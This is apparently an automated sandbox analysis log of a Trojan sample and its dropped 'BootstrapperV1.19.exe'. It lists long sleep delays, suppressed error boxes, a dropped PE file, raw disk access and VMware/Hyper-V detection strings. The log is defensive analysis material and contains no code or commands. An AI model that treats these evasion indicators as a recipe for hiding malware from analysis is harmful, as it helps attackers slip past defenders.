          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeMemory allocated: 1B0B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeMemory allocated: 226E6C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeMemory allocated: 226E8780000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599516Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599406Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599297Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598756Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598225Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598098Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597969Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597734Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597625Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597516Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597406Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597297Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597187Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597078Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596969Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596849Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596500Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596377Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596140Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595795Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595659Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595536Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595406Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595047Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594908Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594781Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594672Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594562Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594453Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594299Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594172Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594047Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593937Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593828Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593719Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593594Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593484Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593375Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeWindow / User API: threadDelayed 3064Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeWindow / User API: threadDelayed 6762Jump to behavior
          Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BITD1EE.tmpJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -27670116110564310s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599516s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599406s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599297s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -598938s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -598756s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -598225s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -598098s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597969s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597844s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597734s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597625s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597516s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597406s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597297s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597187s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -597078s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596969s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596849s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596719s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596500s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596377s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596250s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596140s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -596031s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595922s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595795s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595659s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595536s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595406s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595266s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -595047s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594908s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594781s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594672s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594562s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594453s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594299s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594172s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -594047s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -593937s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -593828s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -593719s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -593594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -593484s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188Thread sleep time: -593375s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6420Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599516Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599406Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599297Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598756Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598225Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 598098Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597969Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597734Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597625Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597516Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597406Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597297Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597187Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 597078Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596969Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596849Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596500Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596377Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596140Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595795Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595659Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595536Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595406Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 595047Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594908Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594781Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594672Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594562Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594453Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594299Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594172Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 594047Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593937Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593828Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593719Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593594Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593484Jump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeThread delayed: delay time: 593375Jump to behavior
          Source: Amcache.hve.12.drBinary or memory string: VMware
          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: svchost.exe, 00000006.00000002.3115711007.00000230ADC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116767133.00000230B325B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116729332.00000230B3240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
